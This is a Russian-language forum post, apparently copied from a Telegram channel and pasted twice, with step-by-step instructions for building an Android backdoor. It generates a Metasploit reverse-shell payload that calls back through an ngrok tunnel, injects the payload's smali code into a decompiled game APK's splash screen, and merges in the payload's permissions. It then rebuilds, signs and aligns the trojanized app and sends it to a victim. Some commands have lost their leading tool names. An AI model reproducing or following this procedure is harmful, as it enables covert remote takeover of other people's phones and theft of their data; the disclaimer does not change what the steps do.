Ioney
Новичок
- Статус
- offline
- Регистрация
- 16.11.2019
- Сообщения
- 2
- Репутация
- 1
Как создать вирус удаленного доступа на Android?
Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.
Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.
Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!
Инструкция
Устанавливаем Kali Linux.
Далее установим Zipalign
apt-get install -y zipalign
Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
tcp 4444
Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk
На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд
d game.apk
apktool d payload.apk
Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
b game
Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000
Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered
Выравниваем подписанное приложение командой
-v 4 game.apk game_good.apk
Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Скопипастил с телеграм канала, сам почитал хз зачем, но интересно)
![7cb1aa4688c54a5e7f90c.png](https://telegra.ph/file/7cb1aa4688c54a5e7f90c.png)
Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.
Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.
Замечу, что эта статья написана только для образовательных целей. Мы никого ни к чему не призываем, только в целях ознакомления! Автор не несёт ответственности за ваши действия!
Инструкция
Устанавливаем Kali Linux.
Далее установим Zipalign
apt-get install -y zipalign
Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.
Сборка бекдора
Запускаем в отдельном окне ngrok
tcp 4444
Полученные lhost и lport используем для создания пейлоада
-p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk
На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд
d game.apk
apktool d payload.apk
Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем
{p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.
Компилируем отредактированный файл игры в apk
b game
Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой
-genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000
Получаем файл key.keystore. Теперь сертифицируем наш apk
-verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered
Выравниваем подписанное приложение командой
-v 4 game.apk game_good.apk
Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
Скопипастил с телеграм канала, сам почитал хз зачем, но интересно)